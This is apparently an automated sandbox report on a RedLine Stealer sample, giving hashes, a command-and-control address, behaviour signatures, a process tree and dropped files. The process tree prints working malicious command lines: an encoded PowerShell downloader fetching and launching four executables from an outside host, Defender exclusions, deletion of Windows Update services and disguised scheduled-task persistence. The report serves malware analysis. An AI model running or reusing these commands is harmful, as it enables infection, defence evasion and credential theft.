Analysis

  • max time kernel
    151s
  • max time network
    59s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    11-01-2023 18:41

General

  • Target

    84fa342db3e61b9a30b76763efbbfaea700476a8.exe

  • Size

    247KB

  • MD5

    1eed44b17228fbc5779f5bb908161e73

  • SHA1

    84fa342db3e61b9a30b76763efbbfaea700476a8

  • SHA256

    ef977f35deec3d30dceafdc1b9ba117928ce3f78156dfa63596bcdf1d0d81d8b

  • SHA512

    3ac850fe79c9f20e2311898f2e9b57a4fc9f45e135b916822105afa00528fc16f73fdf89a7cfdcd020fc4c7f855a12cb8b4dd7b969146fa8e68d104b3b3e4b5a

  • SSDEEP

    6144:w93F+3NnZo50r9uMlWr1o1XUQTH3oXx/EAOhxm09nmvc:S4tZo50r9uMlWg1ZrxtnF

Malware Config

Extracted

Family

redline

Botnet

1

C2

107.182.129.73:21733

Attributes
  • auth_value

    3a5bb0917495b4312d052a0b8977d2bb

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Stops running service(s) 3 TTPs
  • Loads dropped DLL 10 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:480
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:464
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
          2⤵
            PID:796
            • C:\Windows\system32\Dwm.exe
              "C:\Windows\system32\Dwm.exe"
              3⤵
                PID:1396
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k NetworkService
              2⤵
                PID:292
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                2⤵
                  PID:1028
                • C:\Windows\system32\taskhost.exe
                  "taskhost.exe"
                  2⤵
                    PID:1260
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                    2⤵
                      PID:1804
                    • C:\Windows\system32\sppsvc.exe
                      C:\Windows\system32\sppsvc.exe
                      2⤵
                        PID:680
                      • C:\Windows\System32\spoolsv.exe
                        C:\Windows\System32\spoolsv.exe
                        2⤵
                          PID:272
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs
                          2⤵
                          • Drops file in System32 directory
                          • Drops file in Windows directory
                          PID:872
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {A5C179E7-48FB-44C7-AD13-AEBA3FC38ABE} S-1-5-18:NT AUTHORITY\System:Service:
                            3⤵
                              PID:1796
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+'T'+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue('d'+[Char](105)+''+'a'+''+'l'+''+[Char](101)+'r'+[Char](115)+''+[Char](116)+''+[Char](97)+'ger')).EntryPoint.Invoke($Null,$Null)
                                4⤵
                                • Drops file in System32 directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1876
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+'T'+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+'s'+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)
                                4⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1252
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService
                            2⤵
                              PID:832
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                              2⤵
                                PID:740
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k RPCSS
                                2⤵
                                  PID:664
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k DcomLaunch
                                  2⤵
                                    PID:588
                                • C:\Windows\system32\winlogon.exe
                                  winlogon.exe
                                  1⤵
                                    PID:420
                                    • C:\Windows\System32\dllhost.exe
                                      C:\Windows\System32\dllhost.exe /Processid:{c48f4f34-fd61-484e-a924-fecbaaeff328}
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1136
                                  • C:\Windows\system32\lsm.exe
                                    C:\Windows\system32\lsm.exe
                                    1⤵
                                      PID:488
                                    • C:\Windows\Explorer.EXE
                                      C:\Windows\Explorer.EXE
                                      1⤵
                                        PID:1424
                                        • C:\Users\Admin\AppData\Local\Temp\84fa342db3e61b9a30b76763efbbfaea700476a8.exe
                                          "C:\Users\Admin\AppData\Local\Temp\84fa342db3e61b9a30b76763efbbfaea700476a8.exe"
                                          2⤵
                                          • Suspicious use of SetThreadContext
                                          • Suspicious use of WriteProcessMemory
                                          PID:900
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                            3⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:1992
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
                                              4⤵
                                              • Blocklisted process makes network request
                                              • Loads dropped DLL
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of WriteProcessMemory
                                              PID:1136
                                              • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                PID:596
                                              • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                • Suspicious use of WriteProcessMemory
                                                PID:1516
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                  6⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1668
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 116
                                                  6⤵
                                                  • Loads dropped DLL
                                                  • Program crash
                                                  PID:284
                                              • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1932
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                  6⤵
                                                  • Creates scheduled task(s)
                                                  PID:1564
                                              • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                                                5⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Drops file in Drivers directory
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                • Drops file in Program Files directory
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1676
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 48
                                            3⤵
                                            • Program crash
                                            PID:1316
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                          2⤵
                                          • Drops file in System32 directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1248
                                        • C:\Windows\System32\cmd.exe
                                          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                          2⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:1732
                                          • C:\Windows\System32\sc.exe
                                            sc stop UsoSvc
                                            3⤵
                                            • Launches sc.exe
                                            PID:1772
                                          • C:\Windows\System32\sc.exe
                                            sc stop WaaSMedicSvc
                                            3⤵
                                            • Launches sc.exe
                                            PID:1860
                                          • C:\Windows\System32\sc.exe
                                            sc stop wuauserv
                                            3⤵
                                            • Launches sc.exe
                                            PID:364
                                          • C:\Windows\System32\sc.exe
                                            sc stop bits
                                            3⤵
                                            • Launches sc.exe
                                            PID:576
                                          • C:\Windows\System32\sc.exe
                                            sc stop dosvc
                                            3⤵
                                            • Launches sc.exe
                                            PID:1576
                                          • C:\Windows\System32\reg.exe
                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                            3⤵
                                              PID:1928
                                            • C:\Windows\System32\reg.exe
                                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                              3⤵
                                                PID:1976
                                              • C:\Windows\System32\reg.exe
                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                3⤵
                                                • Modifies security service
                                                PID:320
                                              • C:\Windows\System32\reg.exe
                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                3⤵
                                                  PID:568
                                                • C:\Windows\System32\reg.exe
                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                  3⤵
                                                    PID:624
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                                                  2⤵
                                                  • Drops file in System32 directory
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2044
                                                  • C:\Windows\system32\schtasks.exe
                                                    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
                                                    3⤵
                                                    • Creates scheduled task(s)
                                                    PID:1712
                                                • C:\Windows\System32\dialer.exe
                                                  C:\Windows\System32\dialer.exe
                                                  2⤵
                                                    PID:808
                                                • \\?\C:\Windows\system32\wbem\WMIADAP.EXE
                                                  wmiadap.exe /F /T /R
                                                  1⤵
                                                    PID:1764
                                                  • C:\Windows\system32\conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe "109253724-567959356-1028808869912669596-5649941481453252326-1568597773-1334840746"
                                                    1⤵
                                                      PID:1072

                                                    Network

                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                    Execution

                                                    Scripting

                                                    1
                                                    T1064

                                                    Scheduled Task

                                                    1
                                                    T1053

                                                    Persistence

                                                    Modify Existing Service

                                                    2
                                                    T1031

                                                    Scheduled Task

                                                    1
                                                    T1053

                                                    Privilege Escalation

                                                    Scheduled Task

                                                    1
                                                    T1053

                                                    Defense Evasion

                                                    Modify Registry

                                                    1
                                                    T1112

                                                    Impair Defenses

                                                    1
                                                    T1562

                                                    Scripting

                                                    1
                                                    T1064

                                                    Credential Access

                                                    Credentials in Files

                                                    1
                                                    T1081

                                                    Collection

                                                    Data from Local System

                                                    1
                                                    T1005

                                                    Impact

                                                    Service Stop

                                                    1
                                                    T1489

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      bb86a343080f9f4696c250ef31a18d9d

                                                      SHA1

                                                      43b2193dcb1d56eac73ba88a7b461822074192d6

                                                      SHA256

                                                      095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                      SHA512

                                                      24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                    • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      bb86a343080f9f4696c250ef31a18d9d

                                                      SHA1

                                                      43b2193dcb1d56eac73ba88a7b461822074192d6

                                                      SHA256

                                                      095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                      SHA512

                                                      24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                    • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      f5c51e7760315ad0f0238d268c03c60e

                                                      SHA1

                                                      85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                      SHA256

                                                      ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                      SHA512

                                                      d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                    • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      f5c51e7760315ad0f0238d268c03c60e

                                                      SHA1

                                                      85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                      SHA256

                                                      ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                      SHA512

                                                      d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                    • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      b6bbab9f72c88d07b484cc339c475e75

                                                      SHA1

                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                      SHA256

                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                      SHA512

                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                    • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      b6bbab9f72c88d07b484cc339c475e75

                                                      SHA1

                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                      SHA256

                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                      SHA512

                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                    • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                      Filesize

                                                      674KB

                                                      MD5

                                                      e479ecb1802253a4c94767c8af306baf

                                                      SHA1

                                                      846bb5d88b91b8aa17bdb58eaf246b10e6586402

                                                      SHA256

                                                      b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

                                                      SHA512

                                                      b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                      Filesize

                                                      7KB

                                                      MD5

                                                      9b765516d5a484049933abd9ede107ed

                                                      SHA1

                                                      15b8faae7582cb406bc04edea203911b75dfa476

                                                      SHA256

                                                      bf7adb833b3c6547c21234e7a5605388ffd94c570b98d0362387875212578023

                                                      SHA512

                                                      263944ce9f8fe118f8004e8cc09b1f0743f2ab2b35f1f1ad6a69110f35a425d160abc183ad3fa7e6aa0546b2c27ca74e4e3174e737b769eaf4934a8999254234

                                                    • \Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      bb86a343080f9f4696c250ef31a18d9d

                                                      SHA1

                                                      43b2193dcb1d56eac73ba88a7b461822074192d6

                                                      SHA256

                                                      095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                      SHA512

                                                      24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                    • \Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      bb86a343080f9f4696c250ef31a18d9d

                                                      SHA1

                                                      43b2193dcb1d56eac73ba88a7b461822074192d6

                                                      SHA256

                                                      095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                      SHA512

                                                      24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                    • \Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                      Filesize

                                                      3.7MB

                                                      MD5

                                                      f5c51e7760315ad0f0238d268c03c60e

                                                      SHA1

                                                      85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                      SHA256

                                                      ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                      SHA512

                                                      d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                    • \Users\Admin\AppData\Local\Temp\SysApp.exe
                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      b6bbab9f72c88d07b484cc339c475e75

                                                      SHA1

                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                      SHA256

                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                      SHA512

                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                    • \Users\Admin\AppData\Local\Temp\SysApp.exe
                                                      Filesize

                                                      1.4MB

                                                      MD5

                                                      b6bbab9f72c88d07b484cc339c475e75

                                                      SHA1

                                                      f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                      SHA256

                                                      dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                      SHA512

                                                      1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                    • \Users\Admin\AppData\Local\Temp\new2.exe
                                                      Filesize

                                                      674KB

                                                      MD5

                                                      e479ecb1802253a4c94767c8af306baf

                                                      SHA1

                                                      846bb5d88b91b8aa17bdb58eaf246b10e6586402

                                                      SHA256

                                                      b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

                                                      SHA512

                                                      b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

                                                    • \Users\Admin\AppData\Local\Temp\new2.exe
                                                      Filesize

                                                      674KB

                                                      MD5

                                                      e479ecb1802253a4c94767c8af306baf

                                                      SHA1

                                                      846bb5d88b91b8aa17bdb58eaf246b10e6586402

                                                      SHA256

                                                      b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

                                                      SHA512

